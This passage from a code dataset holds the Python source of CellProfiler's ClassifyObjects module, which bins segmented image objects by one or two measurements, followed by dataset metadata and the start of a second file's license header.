\"PctObjectsPerBin\"\nF_NUM_PER_BIN = \"NumObjectsPerBin\"\n\n\nclass ClassifyObjects(Module):\n category = \"Object Processing\"\n module_name = \"ClassifyObjects\"\n variable_revision_number = 2\n\n def create_settings(self):\n \"\"\"Create the settings for the module\n\n Create the settings for the module during initialization.\n \"\"\"\n self.contrast_choice = Choice(\n \"Make each classification decision on how many measurements?\",\n [BY_SINGLE_MEASUREMENT, BY_TWO_MEASUREMENTS],\n doc=\"\"\"\\\nThis setting controls how many measurements are used to make a\nclassifications decision for each object:\n\n- *%(BY_SINGLE_MEASUREMENT)s:* Classifies each object based on a\n single measurement.\n- *%(BY_TWO_MEASUREMENTS)s:* Classifies each object based on a pair\n of measurements taken together (that is, an object must meet two\n criteria to belong to a class).\n\"\"\"\n % globals(),\n )\n\n ############### Single measurement settings ##################\n #\n # A list holding groupings for each of the single measurements\n # to be done\n #\n self.single_measurements = []\n #\n # A count of # of measurements\n #\n self.single_measurement_count = HiddenCount(self.single_measurements)\n #\n # Add one single measurement to start off\n #\n self.add_single_measurement(False)\n #\n # A button to press to get another measurement\n #\n self.add_measurement_button = DoSomething(\n \"\", \"Add another classification\", self.add_single_measurement\n )\n #\n ############### Two-measurement settings #####################\n #\n # The object for the contrasting method\n #\n self.object_name = LabelName(\n \"Select the object name\",\n \"None\",\n doc=\"\"\"\\\nChoose the object that you want to measure from the list. This should be\nan object created by a previous module such as\n**IdentifyPrimaryObjects**, **IdentifySecondaryObjects**, **IdentifyTertiaryObjects**, or **Watershed**\n\"\"\",\n )\n\n #\n # The two measurements for the contrasting method\n #\n def object_fn():\n return self.object_name.value\n\n self.first_measurement = Measurement(\n \"Select the first measurement\",\n object_fn,\n doc=\"\"\"\\\n*(Used only if using a pair of measurements)*\n\nChoose a measurement made on the above object. This is the first of two\nmeasurements that will be contrasted together. The measurement should be\none made on the object in a prior module.\n\"\"\",\n )\n\n self.first_threshold_method = Choice(\n \"Method to select the cutoff\",\n [TM_MEAN, TM_MEDIAN, TM_CUSTOM],\n doc=\"\"\"\\\n*(Used only if using a pair of measurements)*\n\nObjects are classified as being above or below a cutoff value for a\nmeasurement. You can set this cutoff threshold in one of three ways:\n\n- *%(TM_MEAN)s*: At the mean of the measurement’s value for all\n objects in the image cycle.\n- *%(TM_MEDIAN)s*: At the median of the measurement’s value for all\n objects in the image set.\n- *%(TM_CUSTOM)s*: You specify a custom threshold value.\n\"\"\"\n % globals(),\n )\n\n self.first_threshold = Float(\n \"Enter the cutoff value\",\n 0.5,\n doc=\"\"\"\\\n*(Used only if using a pair of measurements)*\n\nThis is the cutoff value separating objects in the two classes.\"\"\",\n )\n\n self.second_measurement = Measurement(\n \"Select the second measurement\",\n object_fn,\n doc=\"\"\"\\\n*(Used only if using a pair of measurements)*\n\nSelect a measurement made on the above object. 
This is\nthe second of two measurements that will be contrasted together.\nThe measurement should be one made on the object in a prior\nmodule.\"\"\",\n )\n\n self.second_threshold_method = Choice(\n \"Method to select the cutoff\",\n [TM_MEAN, TM_MEDIAN, TM_CUSTOM],\n doc=\"\"\"\\\n*(Used only if using a pair of measurements)*\n\nObjects are classified as being above or below a cutoff value for a\nmeasurement. You can set this cutoff threshold in one of three ways:\n\n- *%(TM_MEAN)s:* At the mean of the measurement’s value for all\n objects in the image cycle.\n- *%(TM_MEDIAN)s:* At the median of the measurement’s value for all\n objects in the image set.\n- *%(TM_CUSTOM)s:* You specify a custom threshold value.\n\"\"\"\n % globals(),\n )\n\n self.second_threshold = Float(\n \"Enter the cutoff value\",\n 0.5,\n doc=\"\"\"\\\n*(Used only if using a pair of measurements)*\n\nThis is the cutoff value separating objects in the two classes.\"\"\",\n )\n\n self.wants_custom_names = Binary(\n \"Use custom names for the bins?\",\n False,\n doc=\"\"\"\\\n*(Used only if using a pair of measurements)*\n\nSelect \"*Yes*\" if you want to specify the names of each bin\nmeasurement.\n\nSelect \"*No*\" to create names based on the measurements. For instance,\nfor “Intensity_MeanIntensity_Green” and\n“Intensity_TotalIntensity_Blue”, the module generates measurements\nsuch as\n“Classify_Intensity_MeanIntensity_Green_High_Intensity_TotalIntensity_Low”.\n\"\"\"\n % globals(),\n )\n\n self.low_low_custom_name = Alphanumeric(\n \"Enter the low-low bin name\",\n \"low_low\",\n doc=\"\"\"\\\n*(Used only if using a pair of measurements)*\n\nName of the measurement for objects that fall below the threshold for\nboth measurements.\n\"\"\",\n )\n\n self.low_high_custom_name = Alphanumeric(\n \"Enter the low-high bin name\",\n \"low_high\",\n doc=\"\"\"\\\n*(Used only if using a pair of measurements)*\n\nName of the measurement for objects whose\nfirst measurement is below threshold and whose second measurement\nis above threshold.\n\"\"\",\n )\n\n self.high_low_custom_name = Alphanumeric(\n \"Enter the high-low bin name\",\n \"high_low\",\n doc=\"\"\"\\\n*(Used only if using a pair of measurements)*\n\nName of the measurement for objects whose\nfirst measurement is above threshold and whose second measurement\nis below threshold.\"\"\",\n )\n\n self.high_high_custom_name = Alphanumeric(\n \"Enter the high-high bin name\",\n \"high_high\",\n doc=\"\"\"\\\n*(Used only if using a pair of measurements)*\n\nName of the measurement for objects that\nare above the threshold for both measurements.\"\"\",\n )\n\n self.wants_image = Binary(\n \"Retain an image of the classified objects?\",\n False,\n doc=\"\"\"\\\nSelect \"*Yes*\" to retain the image of the objects color-coded\naccording to their classification, for use later in the pipeline (for\nexample, to be saved by a **SaveImages** module).\n\"\"\"\n % globals(),\n )\n\n self.image_name = ImageName(\n \"Enter the image name\",\n \"None\",\n doc=\"\"\"\\\n*(Used only if the classified object image is to be retained for later use in the pipeline)*\n\nEnter the name to be given to the classified object image.\"\"\",\n )\n\n def add_single_measurement(self, can_delete=True):\n \"\"\"Add a single measurement to the group of single measurements\n\n can_delete - True to include a \"remove\" button, False if you're not\n allowed to remove it.\n \"\"\"\n group = SettingsGroup()\n if can_delete:\n group.append(\"divider\", Divider(line=True))\n\n group.append(\n 
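# Each classification gets its own SettingsGroup; the settings appended\n # below are repeated once per single-measurement classification.\n 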
\"object_name\",\n LabelName(\n \"Select the object to be classified\",\n \"None\",\n doc=\"\"\"\\\nThe name of the objects to be classified. You can choose from objects\ncreated by any previous module. See **IdentifyPrimaryObjects**,\n**IdentifySecondaryObjects**, **IdentifyTertiaryObjects**, or **Watershed**.\n\"\"\",\n ),\n )\n\n def object_fn():\n return group.object_name.value\n\n group.append(\n \"measurement\",\n Measurement(\n \"Select the measurement to classify by\",\n object_fn,\n doc=\"\"\"\\\n*(Used only if using a single measurement)*\n\nSelect a measurement made by a previous module. The objects will be\nclassified according to their values for this measurement.\n\"\"\",\n ),\n )\n\n group.append(\n \"bin_choice\",\n Choice(\n \"Select bin spacing\",\n [BC_EVEN, BC_CUSTOM],\n doc=\"\"\"\\\n*(Used only if using a single measurement)*\n\nSelect how you want to define the spacing of the bins. You have the\nfollowing options:\n\n- *%(BC_EVEN)s:* Choose this option to create the indicated number\n of bins at evenly spaced intervals between the low and high\n threshold. You also have the option to create bins for objects that\n fall below or above the low and high threshold.\n- *%(BC_CUSTOM)s:* Choose this if you want to specify the thresholds\n between bins yourself. If you want two bins, choose this option and\n then provide a single threshold when asked.\n\"\"\"\n % globals(),\n ),\n )\n\n group.append(\n \"bin_count\",\n Integer(\n \"Number of bins\",\n 3,\n minval=1,\n doc=\"\"\"\\\n*(Used only if using a single measurement)*\n\nThis is the number of bins that will be created between\nthe low and high threshold\"\"\",\n ),\n )\n\n group.append(\n \"low_threshold\",\n Float(\n \"Lower threshold\",\n 0,\n doc=\"\"\"\\\n*(Used only if using a single measurement and \"%(BC_EVEN)s\" selected)*\n\nThis is the threshold that separates the lowest bin from the others. The\nlower threshold, upper threshold, and number of bins define the\nthresholds of bins between the lowest and highest.\n\"\"\"\n % globals(),\n ),\n )\n\n group.append(\n \"wants_low_bin\",\n Binary(\n \"Use a bin for objects below the threshold?\",\n False,\n doc=\"\"\"\\\n*(Used only if using a single measurement)*\n\nSelect \"*Yes*\" if you want to create a bin for objects whose values\nfall below the low threshold. Select \"*No*\" if you do not want a bin\nfor these objects.\n\"\"\"\n % globals(),\n ),\n )\n\n group.append(\n \"high_threshold\",\n Float(\n \"Upper threshold\",\n 1,\n doc=\"\"\"\\\n*(Used only if using a single measurement and \"%(BC_EVEN)s\" selected)*\n\nThis is the threshold that separates the last bin from the others. Note\nthat if you would like two bins, you should select \"*%(BC_CUSTOM)s*\".\n\"\"\"\n % globals(),\n ),\n )\n\n group.append(\n \"wants_high_bin\",\n Binary(\n \"Use a bin for objects above the threshold?\",\n False,\n doc=\"\"\"\\\n*(Used only if using a single measurement)*\n\nSelect \"*Yes*\" if you want to create a bin for objects whose values\nare above the high threshold.\n\nSelect \"*No*\" if you do not want a bin for these objects.\n\"\"\"\n % globals(),\n ),\n )\n\n group.append(\n \"custom_thresholds\",\n Text(\n \"Enter the custom thresholds separating the values between bins\",\n \"0,1\",\n doc=\"\"\"\\\n*(Used only if using a single measurement and \"%(BC_CUSTOM)s\" selected)*\n\nThis setting establishes the threshold values for the bins. 
You should\nenter one threshold between each bin, separating thresholds with commas\n(for example, *0.3, 1.5, 2.1* for four bins). The module will create one\nmore bin than there are thresholds.\n\"\"\"\n % globals(),\n ),\n )\n\n group.append(\n \"wants_custom_names\",\n Binary(\n \"Give each bin a name?\",\n False,\n doc=\"\"\"\\\n*(Used only if using a single measurement)*\n\nSelect \"*Yes*\" to assign custom names to bins you have specified.\n\nSelect \"*No*\" for the module to automatically assign names based on\nthe measurements and the bin number.\n\"\"\"\n % globals(),\n ),\n )\n\n group.append(\n \"bin_names\",\n Text(\n \"Enter the bin names separated by commas\",\n \"None\",\n doc=\"\"\"\\\n*(Used only if \"Give each bin a name?\" is checked)*\n\nEnter names for each of the bins, separated by commas.\nAn example including three bins might be *First,Second,Third*.\"\"\",\n ),\n )\n\n group.append(\n \"wants_images\",\n Binary(\n \"Retain an image of the classified objects?\",\n False,\n doc=\"\"\"\\\nSelect \"*Yes*\" to keep an image of the objects which is color-coded\naccording to their classification, for use later in the pipeline (for\nexample, to be saved by a **SaveImages** module).\n\"\"\"\n % globals(),\n ),\n )\n\n group.append(\n \"image_name\",\n ImageName(\n \"Name the output image\",\n \"ClassifiedNuclei\",\n doc=\"\"\"Enter the name to be given to the classified object image.\"\"\",\n ),\n )\n\n group.can_delete = can_delete\n\n def number_of_bins():\n \"\"\"Return the # of bins in this classification\"\"\"\n if group.bin_choice == BC_EVEN:\n value = group.bin_count.value\n else:\n value = len(group.custom_thresholds.value.split(\",\")) - 1\n if group.wants_low_bin:\n value += 1\n if group.wants_high_bin:\n value += 1\n return value\n\n group.number_of_bins = number_of_bins\n\n def measurement_name():\n \"\"\"Get the measurement name to use inside the bin name\n\n Account for conflicts with previous measurements\n \"\"\"\n measurement_name = group.measurement.value\n other_same = 0\n for other in self.single_measurements:\n if id(other) == id(group):\n break\n if other.measurement.value == measurement_name:\n other_same += 1\n if other_same > 0:\n measurement_name += str(other_same)\n return measurement_name\n\n def bin_feature_names():\n \"\"\"Return the feature names for each bin\"\"\"\n if group.wants_custom_names:\n return [name.strip() for name in group.bin_names.value.split(\",\")]\n return [\n \"_\".join((measurement_name(), \"Bin_%d\" % (i + 1)))\n for i in range(number_of_bins())\n ]\n\n group.bin_feature_names = bin_feature_names\n\n def validate_group():\n bin_name_count = len(bin_feature_names())\n bin_count = number_of_bins()\n if bin_count < 1:\n bad_setting = (\n group.bin_count\n if group.bin_choice == BC_EVEN\n else group.custom_thresholds\n )\n raise ValidationError(\n \"You must have at least one bin in order to take measurements. 
\"\n \"Either add more bins or ask for bins for objects above or below threshold\",\n bad_setting,\n )\n if bin_name_count != number_of_bins():\n raise ValidationError(\n \"The number of bin names (%d) does not match the number of bins (%d).\"\n % (bin_name_count, bin_count),\n group.bin_names,\n )\n for bin_feature_name in bin_feature_names():\n Alphanumeric.validate_alphanumeric_text(\n bin_feature_name, group.bin_names, True\n )\n if group.bin_choice == BC_CUSTOM:\n try:\n [float(x.strip()) for x in group.custom_thresholds.value.split(\",\")]\n except ValueError:\n raise ValidationError(\n \"Custom thresholds must be a comma-separated list \"\n 'of numbers (example: \"1.0, 2.3, 4.5\")',\n group.custom_thresholds,\n )\n elif group.bin_choice == BC_EVEN:\n if group.low_threshold.value >= group.high_threshold.value:\n raise ValidationError(\n \"Lower Threshold must be less than Upper Threshold\",\n group.low_threshold,\n )\n\n group.validate_group = validate_group\n\n if can_delete:\n group.remove_settings_button = RemoveSettingButton(\n \"\", \"Remove this classification\", self.single_measurements, group\n )\n self.single_measurements.append(group)\n\n def settings(self):\n result = [self.contrast_choice, self.single_measurement_count]\n result += functools.reduce(\n lambda x, y: x + y,\n [group.pipeline_settings() for group in self.single_measurements],\n )\n result += [\n self.object_name,\n self.first_measurement,\n self.first_threshold_method,\n self.first_threshold,\n self.second_measurement,\n self.second_threshold_method,\n self.second_threshold,\n self.wants_custom_names,\n self.low_low_custom_name,\n self.low_high_custom_name,\n self.high_low_custom_name,\n self.high_high_custom_name,\n self.wants_image,\n self.image_name,\n ]\n return result\n\n def visible_settings(self):\n result = [self.contrast_choice]\n if self.contrast_choice == BY_TWO_MEASUREMENTS:\n #\n # Visible settings if there are two measurements\n #\n result += [self.object_name]\n for measurement_setting, threshold_method_setting, threshold_setting in (\n (\n self.first_measurement,\n self.first_threshold_method,\n self.first_threshold,\n ),\n (\n self.second_measurement,\n self.second_threshold_method,\n self.second_threshold,\n ),\n ):\n result += [measurement_setting, threshold_method_setting]\n if threshold_method_setting == TM_CUSTOM:\n result += [threshold_setting]\n result += [self.wants_custom_names]\n if self.wants_custom_names:\n result += [\n self.low_low_custom_name,\n self.low_high_custom_name,\n self.high_low_custom_name,\n self.high_high_custom_name,\n ]\n result += [self.wants_image]\n if self.wants_image:\n result += [self.image_name]\n else:\n #\n # Visible results per single measurement\n #\n for group in self.single_measurements:\n if group.can_delete:\n result += [group.divider]\n result += [group.object_name, group.measurement, group.bin_choice]\n if group.bin_choice == BC_EVEN:\n result += [\n group.bin_count,\n group.low_threshold,\n group.wants_low_bin,\n group.high_threshold,\n group.wants_high_bin,\n ]\n else:\n result += [\n group.custom_thresholds,\n group.wants_low_bin,\n group.wants_high_bin,\n ]\n result += [group.wants_custom_names]\n if group.wants_custom_names:\n result += [group.bin_names]\n result += [group.wants_images]\n if group.wants_images:\n result += [group.image_name]\n if group.can_delete:\n result += [group.remove_settings_button]\n result += [self.add_measurement_button]\n return result\n\n def run(self, workspace):\n \"\"\"Classify the objects in the image 
cycle\"\"\"\n if self.contrast_choice == BY_SINGLE_MEASUREMENT:\n if self.show_window:\n workspace.display_data.labels = []\n workspace.display_data.bins = []\n workspace.display_data.values = []\n for group in self.single_measurements:\n self.run_single_measurement(group, workspace)\n elif self.contrast_choice == BY_TWO_MEASUREMENTS:\n self.run_two_measurements(workspace)\n else:\n raise ValueError(\n \"Invalid classification method: %s\" % self.contrast_choice.value\n )\n\n def display(self, workspace, figure):\n if self.contrast_choice == BY_TWO_MEASUREMENTS:\n self.display_two_measurements(workspace, figure)\n else:\n self.display_single_measurement(workspace, figure)\n\n def get_feature_name_matrix(self):\n \"\"\"Get a 2x2 matrix of feature names for two measurements\"\"\"\n if self.wants_custom_names:\n return numpy.array(\n [\n [self.low_low_custom_name.value, self.low_high_custom_name.value],\n [self.high_low_custom_name.value, self.high_high_custom_name.value],\n ]\n )\n else:\n m1 = self.first_measurement.value\n m2 = self.second_measurement.value\n return numpy.array(\n [\n [\"_\".join((m1, a1, m2, a2)) for a2 in (\"low\", \"high\")]\n for a1 in (\"low\", \"high\")\n ]\n )\n\n def run_two_measurements(self, workspace):\n measurements = workspace.measurements\n in_high_class = []\n saved_values = []\n objects = workspace.object_set.get_objects(self.object_name.value)\n has_nan_measurement = numpy.zeros(objects.count, bool)\n for feature, threshold_method, threshold in (\n (self.first_measurement, self.first_threshold_method, self.first_threshold),\n (\n self.second_measurement,\n self.second_threshold_method,\n self.second_threshold,\n ),\n ):\n values = measurements.get_current_measurement(\n self.object_name.value, feature.value\n )\n if len(values) < objects.count:\n values = numpy.hstack(\n (values, [numpy.NaN] * (objects.count - len(values)))\n )\n saved_values.append(values)\n has_nan_measurement = has_nan_measurement | numpy.isnan(values)\n if threshold_method == TM_CUSTOM:\n t = threshold.value\n elif len(values) == 0:\n t = 0\n elif threshold_method == TM_MEAN:\n t = numpy.mean(values[~numpy.isnan(values)])\n elif threshold_method == TM_MEDIAN:\n t = numpy.median(values[~numpy.isnan(values)])\n else:\n raise ValueError(\n \"Unknown threshold method: %s\" % threshold_method.value\n )\n in_high_class.append(values >= t)\n feature_names = self.get_feature_name_matrix()\n num_values = len(values)\n for i in range(2):\n for j in range(2):\n in_class = (\n (in_high_class[0].astype(int) == i)\n & (in_high_class[1].astype(int) == j)\n & (~has_nan_measurement)\n )\n measurements.add_measurement(\n self.object_name.value,\n \"_\".join((M_CATEGORY, feature_names[i, j])),\n in_class.astype(int),\n )\n num_hits = in_class.sum()\n measurement_name = \"_\".join(\n (M_CATEGORY, feature_names[i, j], F_NUM_PER_BIN)\n )\n measurements.add_measurement(IMAGE, measurement_name, num_hits)\n measurement_name = \"_\".join(\n (M_CATEGORY, feature_names[i, j], F_PCT_PER_BIN)\n )\n measurements.add_measurement(\n IMAGE,\n measurement_name,\n 100.0 * float(num_hits) / num_values if num_values > 0 else 0,\n )\n\n if self.wants_image:\n class_1, class_2 = in_high_class\n object_codes = class_1.astype(int) + class_2.astype(int) * 2 + 1\n object_codes = numpy.hstack(([0], object_codes))\n object_codes[numpy.hstack((False, numpy.isnan(values)))] = 0\n nobjects = len(class_1)\n mapping = numpy.zeros(nobjects + 1, int)\n mapping[1:] = numpy.arange(1, nobjects + 1)\n labels = 
object_codes[mapping[objects.segmented]]\n colors = self.get_colors(4)\n image = colors[labels, :3]\n image = Image(image, parent_image=objects.parent_image)\n workspace.image_set.add(self.image_name.value, image)\n\n if self.show_window:\n workspace.display_data.in_high_class = in_high_class\n workspace.display_data.labels = (objects.segmented,)\n workspace.display_data.saved_values = saved_values\n\n def display_two_measurements(self, workspace, figure):\n figure.set_subplots((2, 2))\n object_name = self.object_name.value\n for i, feature_name in (\n (0, self.first_measurement.value),\n (1, self.second_measurement.value),\n ):\n saved_values = workspace.display_data.saved_values[i]\n good_saved_values = saved_values[~numpy.isnan(saved_values)]\n if len(good_saved_values) == 0:\n figure.subplot_table(i, 0, [[\"No %s objects found\" % object_name]])\n else:\n axes = figure.subplot(i, 0)\n axes.hist(good_saved_values)\n axes.set_xlabel(feature_name)\n axes.set_ylabel(\"# of %s\" % object_name)\n class_1, class_2 = workspace.display_data.in_high_class\n object_codes = class_1.astype(int) + class_2.astype(int) * 2 + 1\n object_codes = numpy.hstack(([0], object_codes))\n nobjects = len(class_1)\n mapping = numpy.zeros(nobjects + 1, int)\n mapping[1:] = numpy.arange(1, nobjects + 1)\n for i in range(2):\n saved_values = workspace.display_data.saved_values[i]\n mapping[1:][numpy.isnan(saved_values)] = 0\n labels = object_codes[mapping[workspace.display_data.labels]]\n figure.subplot_imshow_labels(0, 1, labels, title=object_name)\n #\n # Draw a 4-bar histogram\n #\n axes = figure.subplot(1, 1)\n values = object_codes[1:]\n axes.hist(values[~numpy.isnan(values)], bins=4, range=(0.5, 4.5))\n axes.set_xticks((1, 2, 3, 4))\n if self.wants_custom_names:\n axes.set_xticklabels(\n (\n self.low_low_custom_name.value,\n self.high_low_custom_name.value,\n self.low_high_custom_name.value,\n self.high_high_custom_name.value,\n )\n )\n else:\n axes.set_xticklabels((\"low\\nlow\", \"high\\nlow\", \"low\\nhigh\", \"high\\nhigh\"))\n axes.set_ylabel(\"# of %s\" % object_name)\n colors = self.get_colors(len(axes.patches))\n #\n # The patches are the rectangles in the histogram\n #\n for i, patch in enumerate(axes.patches):\n patch.set_facecolor(colors[i + 1, :])\n\n def run_single_measurement(self, group, workspace):\n \"\"\"Classify objects based on one measurement\"\"\"\n object_name = group.object_name.value\n feature = group.measurement.value\n objects = workspace.object_set.get_objects(object_name)\n measurements = workspace.measurements\n values = measurements.get_current_measurement(object_name, feature)\n #\n # Pad values if too few (defensive programming).\n #\n if len(values) < objects.count:\n values = numpy.hstack((values, [numpy.NaN] * (objects.count - len(values))))\n if group.bin_choice == BC_EVEN:\n low_threshold = group.low_threshold.value\n high_threshold = group.high_threshold.value\n if low_threshold >= high_threshold:\n raise ValueError(\"Lower Threshold must be less than Upper Threshold\")\n bin_count = group.bin_count.value\n thresholds = (\n numpy.arange(bin_count + 1)\n * (high_threshold - low_threshold)\n / float(bin_count)\n + low_threshold\n )\n else:\n thresholds = [\n float(x.strip()) for x in group.custom_thresholds.value.split(\",\")\n ]\n #\n # Put infinities at either end of the thresholds so we can bin the\n # low and high bins\n #\n thresholds = numpy.hstack(\n (\n [-numpy.inf] if group.wants_low_bin else [],\n thresholds,\n [numpy.inf] if group.wants_high_bin else [],\n )\n 
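# Worked example: the default custom thresholds \"0,1\" with both\n # wants_low_bin and wants_high_bin enabled become [-inf, 0, 1, inf],\n # i.e. three bins (-inf, 0], (0, 1], (1, inf].\n 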
)\n #\n # Do a cross-product of objects and threshold comparisons\n #\n ob_idx, th_idx = numpy.mgrid[0 : len(values), 0 : len(thresholds) - 1]\n bin_hits = (values[ob_idx] > thresholds[th_idx]) & (\n values[ob_idx] <= thresholds[th_idx + 1]\n )\n num_values = len(values)\n for bin_idx, feature_name in enumerate(group.bin_feature_names()):\n measurement_name = \"_\".join((M_CATEGORY, feature_name))\n measurements.add_measurement(\n object_name, measurement_name, bin_hits[:, bin_idx].astype(int)\n )\n measurement_name = \"_\".join((M_CATEGORY, feature_name, F_NUM_PER_BIN))\n num_hits = bin_hits[:, bin_idx].sum()\n measurements.add_measurement(IMAGE, measurement_name, num_hits)\n measurement_name = \"_\".join((M_CATEGORY, feature_name, F_PCT_PER_BIN))\n measurements.add_measurement(\n IMAGE,\n measurement_name,\n 100.0 * float(num_hits) / num_values if num_values > 0 else 0,\n )\n if group.wants_images or self.show_window:\n colors = self.get_colors(bin_hits.shape[1])\n object_bins = numpy.sum(bin_hits * th_idx, 1) + 1\n object_color = numpy.hstack(([0], object_bins))\n object_color[numpy.hstack((False, numpy.isnan(values)))] = 0\n labels = object_color[objects.segmented]\n if group.wants_images:\n image = colors[labels, :3]\n workspace.image_set.add(\n group.image_name.value,\n Image(image, parent_image=objects.parent_image),\n )\n\n if self.show_window:\n workspace.display_data.bins.append(object_bins[~numpy.isnan(values)])\n workspace.display_data.labels.append(labels)\n workspace.display_data.values.append(values[~numpy.isnan(values)])\n\n def display_single_measurement(self, workspace, figure):\n \"\"\"Display an array of single measurements\"\"\"\n figure.set_subplots((3, len(self.single_measurements)))\n for i, group in enumerate(self.single_measurements):\n bin_hits = workspace.display_data.bins[i]\n labels = workspace.display_data.labels[i]\n values = workspace.display_data.values[i]\n if len(values) == 0:\n continue\n #\n # A histogram of the values\n #\n axes = figure.subplot(0, i)\n axes.hist(values[~numpy.isnan(values)])\n axes.set_xlabel(group.measurement.value)\n axes.set_ylabel(\"# of %s\" % group.object_name.value)\n #\n # A histogram of the labels yielding the bins\n #\n axes = figure.subplot(1, i)\n axes.hist(\n bin_hits,\n bins=group.number_of_bins(),\n range=(0.5, group.number_of_bins() + 0.5),\n )\n axes.set_xticks(numpy.arange(1, group.number_of_bins() + 1))\n if group.wants_custom_names:\n axes.set_xticklabels(group.bin_names.value.split(\",\"))\n axes.set_xlabel(group.measurement.value)\n axes.set_ylabel(\"# of %s\" % group.object_name.value)\n colors = self.get_colors(len(axes.patches))\n for j, patch in enumerate(axes.patches):\n patch.set_facecolor(colors[j + 1, :])\n #\n # The labels matrix\n #\n figure.subplot_imshow_labels(\n 2,\n i,\n labels,\n title=group.object_name.value,\n sharexy=figure.subplot(2, 0),\n )\n\n def get_colors(self, count):\n \"\"\"Get colors used for two-measurement labels image\"\"\"\n import matplotlib.cm as cm\n\n cmap = cm.get_cmap(get_default_colormap())\n #\n # Trick the colormap into divulging the values used.\n #\n sm = cm.ScalarMappable(cmap=cmap)\n colors = sm.to_rgba(numpy.arange(count) + 1)\n return numpy.vstack((numpy.zeros(colors.shape[1]), colors))\n\n def prepare_settings(self, setting_values):\n \"\"\"Do any sort of adjustment to the settings required for the given values\n\n setting_values - the values for the settings\n\n This method allows a module to specialize itself according to\n the number of settings and their 
value. For instance, a module that\n takes a variable number of images or objects can increase or decrease\n the number of relevant settings so they map correctly to the values.\"\"\"\n\n single_measurement_count = int(setting_values[1])\n if single_measurement_count < len(self.single_measurements):\n del self.single_measurements[single_measurement_count:]\n while single_measurement_count > len(self.single_measurements):\n self.add_single_measurement(True)\n\n def validate_module(self, pipeline):\n if self.contrast_choice == BY_SINGLE_MEASUREMENT:\n for group in self.single_measurements:\n group.validate_group()\n\n def upgrade_settings(self, setting_values, variable_revision_number, module_name):\n \"\"\"Adjust setting values if they came from a previous revision\n\n setting_values - a sequence of strings representing the settings\n for the module as stored in the pipeline\n variable_revision_number - the variable revision number of the\n module at the time the pipeline was saved. Use this\n to determine how the incoming setting values map\n to those of the current module version.\n module_name - the name of the module that did the saving. This can be\n used to import the settings from another module if\n that module was merged into the current module\n \"\"\"\n if variable_revision_number == 1:\n # we modified this in the code but didn't want to bump the variable revision number.\n if BY_SINGLE_MEASUREMENT in setting_values[0]:\n contrast_choice = BY_SINGLE_MEASUREMENT\n else:\n contrast_choice = BY_TWO_MEASUREMENTS\n #\n # We inserted wants_low_bin and wants_high_bin in each group\n #\n new_setting_values = [contrast_choice, setting_values[1]]\n setting_values = setting_values[2:]\n for i in range(int(new_setting_values[1])):\n new_setting_values += setting_values[:3]\n #\n # Bin count changed: don't count the outer 2 bins\n #\n new_setting_values += [str(int(setting_values[3]) - 2)]\n new_setting_values += [setting_values[4]] + [\"Yes\"]\n new_setting_values += [setting_values[5]] + [\"Yes\"]\n new_setting_values += setting_values[6:11]\n setting_values = setting_values[11:]\n new_setting_values += setting_values\n setting_values = new_setting_values\n variable_revision_number = 2\n\n return setting_values, variable_revision_number\n\n def get_measurement_columns(self, pipeline):\n columns = []\n if self.contrast_choice == BY_SINGLE_MEASUREMENT:\n for group in self.single_measurements:\n columns += [\n (\n IMAGE,\n \"_\".join((M_CATEGORY, feature_name, F_NUM_PER_BIN)),\n COLTYPE_INTEGER,\n )\n for feature_name in group.bin_feature_names()\n ]\n columns += [\n (\n IMAGE,\n \"_\".join((M_CATEGORY, feature_name, F_PCT_PER_BIN)),\n COLTYPE_FLOAT,\n )\n for feature_name in group.bin_feature_names()\n ]\n columns += [\n (\n group.object_name.value,\n \"_\".join((M_CATEGORY, feature_name)),\n COLTYPE_INTEGER,\n )\n for feature_name in group.bin_feature_names()\n ]\n else:\n names = self.get_feature_name_matrix()\n columns += [\n (IMAGE, \"_\".join((M_CATEGORY, name, F_NUM_PER_BIN)), COLTYPE_INTEGER,)\n for name in names.flatten()\n ]\n columns += [\n (IMAGE, \"_\".join((M_CATEGORY, name, F_PCT_PER_BIN)), COLTYPE_FLOAT,)\n for name in names.flatten()\n ]\n columns += [\n (self.object_name.value, \"_\".join((M_CATEGORY, name)), COLTYPE_INTEGER,)\n for name in names.flatten()\n ]\n return columns\n\n def get_categories(self, pipeline, object_name):\n \"\"\"Return the categories of measurements that this module produces\n\n object_name - return measurements made on this object (or 'Image' for 
image measurements)\n \"\"\"\n if (\n (object_name == IMAGE)\n or (\n self.contrast_choice == BY_SINGLE_MEASUREMENT\n and object_name\n in [group.object_name.value for group in self.single_measurements]\n )\n or (\n self.contrast_choice == BY_TWO_MEASUREMENTS\n and object_name == self.object_name\n )\n ):\n return [M_CATEGORY]\n\n return []\n\n def get_measurements(self, pipeline, object_name, category):\n \"\"\"Return the measurements that this module produces\n\n object_name - return measurements made on this object (or 'Image' for image measurements)\n category - return measurements made in this category\n \"\"\"\n if category != M_CATEGORY:\n return []\n if self.contrast_choice == BY_SINGLE_MEASUREMENT:\n result = []\n for group in self.single_measurements:\n if group.object_name == object_name:\n return group.bin_feature_names()\n elif object_name == IMAGE:\n for image_features in (F_NUM_PER_BIN, F_PCT_PER_BIN):\n for bin_feature_names in group.bin_feature_names():\n result += [\"_\".join((bin_feature_names, image_features))]\n return result\n elif self.contrast_choice == BY_TWO_MEASUREMENTS:\n if self.object_name == object_name:\n return self.get_feature_name_matrix().flatten().tolist()\n elif object_name == IMAGE:\n result = []\n for image_features in (F_NUM_PER_BIN, F_PCT_PER_BIN):\n for bin_feature_names in (\n self.get_feature_name_matrix().flatten().tolist()\n ):\n result += [\"_\".join((bin_feature_names, image_features))]\n return result\n return []\n","sub_path":"cellprofiler/modules/classifyobjects.py","file_name":"classifyobjects.py","file_ext":"py","file_size_in_byte":44948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"313460761","text":"#!/usr/bin/env python\n\n# Copyright (c) 2018, University of Stuttgart\n# All rights reserved.\n#\n# Permission to use, copy, modify, and distribute this software for any purpose\n# with or without fee is hereby granted, provided that the above copyright\n# notice and this permission notice appear in all copies.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH\n# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY\n# AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT,\n# INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM\n# LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR\n# OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR\n# 